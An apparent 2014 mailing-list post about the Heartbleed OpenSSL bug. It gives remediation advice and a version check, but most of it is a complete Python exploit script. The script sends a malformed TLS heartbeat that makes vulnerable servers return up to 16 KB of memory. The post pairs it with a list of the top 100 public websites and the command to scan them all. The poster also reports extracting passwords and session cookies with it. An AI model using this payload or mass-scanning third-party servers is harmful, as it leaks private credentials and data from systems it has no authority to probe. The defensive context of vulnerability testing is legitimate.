


On 4/9/2014 10:10 AM, Steinmetz, Paul wrote:
The vulnerability is being referred to as the Heartbleed Bug. It allows an attacker to leak memory of transactions and possibly decrypt the encrypted data. Reports indicate that the vulnerability is found in OpenSSL version 1.0.1 and subsequent subversions (a) through (f).

I posted about this yesterday.

There are two ways to look at this:
1) You are the client
2) You are the server

As a client, I've been using a Python script and a csv file to actually
test the web sites I want to go to before I go there. This is only
partially useful, since the bug has been in the wild for years and
anyone could have been sniffing server memory for all that time.

I have also used that Python script to hit all of my servers to see if
they are vulnerable.

This is not theoretical. I was able to get user profiles, cookies,
passwords, session IDs and more from servers we own. All in plaintext.

If your servers are vulnerable:
1) Patch OpenSSL
2) Get new SSL certificates
3) Change all passwords

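A quick way to sanity-check step 1 on a given box is to see whether the OpenSSL build falls in the affected range. The following is only a rough sketch of the idea on my part: it reports the OpenSSL that the local Python is linked against, which is not necessarily the same library your TLS-enabled server uses, so treat it as a hint, not proof.

import ssl

# (1, 0, 1, 0) is 1.0.1 with no patch letter; (1, 0, 1, 6) is 1.0.1f.
# 1.0.1g and later carry the fix.
ver = ssl.OPENSSL_VERSION_INFO      # (major, minor, fix, patch, status)
affected = (1, 0, 1, 0) <= ver[:4] <= (1, 0, 1, 6)
print ssl.OPENSSL_VERSION, "-", ("in the affected range" if affected else "outside the affected range")
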
If you are a client (and this includes IBM i as a client to SSL-enabled
servers), test the server you are connecting to for vulnerability. Once
it is patched, change the passwords. It is useless to change the
password until the server is patched, because someone will be able to
sniff the newly changed password.

heartbleed.py

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@xxxxxxxxxxxxx)
# The author disclaims copyright to this source code.

# Quickly and dirtily modified by Mustafa Al-Bassam (mus@xxxxxxxxxxxx) to test
# the Alexa top X.

# Note: this is a Python 2 script (print statements, xrange, str.decode('hex')).

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog file max',
                       description='Test for SSL heartbeat vulnerability (CVE-2014-0160) '
                                   'on multiple domains, takes in Alexa top X CSV file')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

# TLS ClientHello record.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Malformed heartbeat request: record type 18 (heartbeat), TLS 1.1, length 3;
# heartbeat type 01 (request) claiming a 0x4000-byte payload that is never sent,
# which is what tricks a vulnerable server into echoing back up to 16 KB of memory.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
        #print '  %04x: %-48s %s' % (b, hxdat, pdat)
    #print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            try:
                data = s.recv(remain)
            except Exception, e:
                return None
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        #print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        #print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    #print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            #print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            #print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                #print 'WARNING: server returned more data than it should - server is vulnerable!'
                return True
            else:
                #print 'Server processed malformed heartbeat, but did not return any extra data.'
                return False

        if typ == 21:
            #print 'Received alert:'
            hexdump(pay)
            #print 'Server returned error, likely not vulnerable'
            return False

def is_vulnerable(domain):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    #print 'Connecting...'
    #sys.stdout.flush()
    try:
        s.connect((domain, 443))
    except Exception, e:
        return None
    #print 'Sending Client Hello...'
    #sys.stdout.flush()
    s.send(hello)
    #print 'Waiting for Server Hello...'
    #sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            #print 'Server closed connection without sending Server Hello.'
            return None
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    #print 'Sending heartbeat request...'
    #sys.stdout.flush()
    s.send(hb)
    return hit_hb(s)

def main():
    opts, args = options.parse_args()
    if len(args) < 2:
        options.print_help()
        return

    counter_nossl = 0
    counter_notvuln = 0
    counter_vuln = 0

    f = open(args[0], 'r')
    for line in f:
        # Take only the first two columns so a trailing comma on each
        # line (as in the list below) does not break the unpack.
        rank, domain = line.split(',')[:2]
        domain = domain.strip()
        print "Testing " + domain + "... ",
        sys.stdout.flush()
        result = is_vulnerable(domain)
        if result is None:
            print "no SSL."
            counter_nossl += 1
        elif result:
            print "vulnerable."
            counter_vuln += 1
        else:
            print "not vulnerable."
            counter_notvuln += 1

        if int(rank) >= int(args[1]):
            break

    print
    print "No SSL: " + str(counter_nossl)
    print "Vulnerable: " + str(counter_vuln)
    print "Not vulnerable: " + str(counter_notvuln)

if __name__ == '__main__':
    main()
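
The script as posted drives everything from a CSV of rank,domain pairs. To
spot-check a single host, something like the following works; this is just a
sketch on my part, assuming the listing above is saved as heartbleed.py in the
current directory, and the host name is only a placeholder:

from heartbleed import is_vulnerable

result = is_vulnerable('www.example.com')   # substitute the host you care about
if result is None:
    print "no SSL / could not connect"
elif result:
    print "VULNERABLE - patch and re-key before changing passwords"
else:
    print "not vulnerable"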

The CSV file simply has a rank number in the first column and a web site in
the second. Here are the top 100 web sites (a sample invocation follows the list):

1,google.com,
2,facebook.com,
3,youtube.com,
4,yahoo.com,
5,baidu.com,
6,wikipedia.org,
7,qq.com,
8,twitter.com,
9,live.com,
10,linkedin.com,
11,taobao.com,
12,amazon.com,
13,google.co.in,
14,sina.com.cn,
15,blogspot.com,
16,hao123.com,
17,weibo.com,
18,wordpress.com,
19,yahoo.co.jp,
20,vk.com,
21,yandex.ru,
22,ebay.com,
23,bing.com,
24,google.de,
25,tmall.com,
26,pinterest.com,
27,sohu.com,
28,google.co.uk,
29,ask.com,
30,360.cn,
31,google.fr,
32,google.co.jp,
33,msn.com,
34,instagram.com,
35,tumblr.com,
36,163.com,
37,google.com.br,
38,mail.ru,
39,microsoft.com,
40,paypal.com,
41,soso.com,
42,adcash.com,
43,google.ru,
44,xvideos.com,
45,google.es,
46,google.it,
47,imdb.com,
48,apple.com,
49,imgur.com,
50,cnn.com,
51,neobux.com,
52,craigslist.org,
53,amazon.co.jp,
54,google.com.hk,
55,stackoverflow.com,
56,xhamster.com,
57,google.com.mx,
58,reddit.com,
59,gmw.cn,
60,ifeng.com,
61,vube.com,
62,go.com,
63,bbc.co.uk,
64,google.ca,
65,blogger.com,
66,fc2.com,
67,xinhuanet.com,
68,aliexpress.com,
69,odnoklassniki.ru,
70,alipay.com,
71,akamaihd.net,
72,alibaba.com,
73,googleusercontent.com,
74,wordpress.org,
75,godaddy.com,
76,google.com.tr,
77,t.co,
78,huffingtonpost.com,
79,pornhub.com,
80,google.com.au,
81,about.com,
82,people.com.cn,
83,amazon.de,
84,kickass.to,
85,youku.com,
86,ebay.de,
87,thepiratebay.se,
88,espn.go.com,
89,google.pl,
90,blogspot.in,
91,clkmon.com,
92,dailymotion.com,
93,flickr.com,
94,bp.blogspot.com,
95,netflix.com,
96,conduit.com,
97,dailymail.co.uk,
98,china.com,
99,adobe.com,
100,vimeo.com,
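
Assuming the list above is saved as, say, top100.csv (the file name is just an
example), the script is invoked with the file and the highest rank to test:

python heartbleed.py top100.csv 100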


--buck
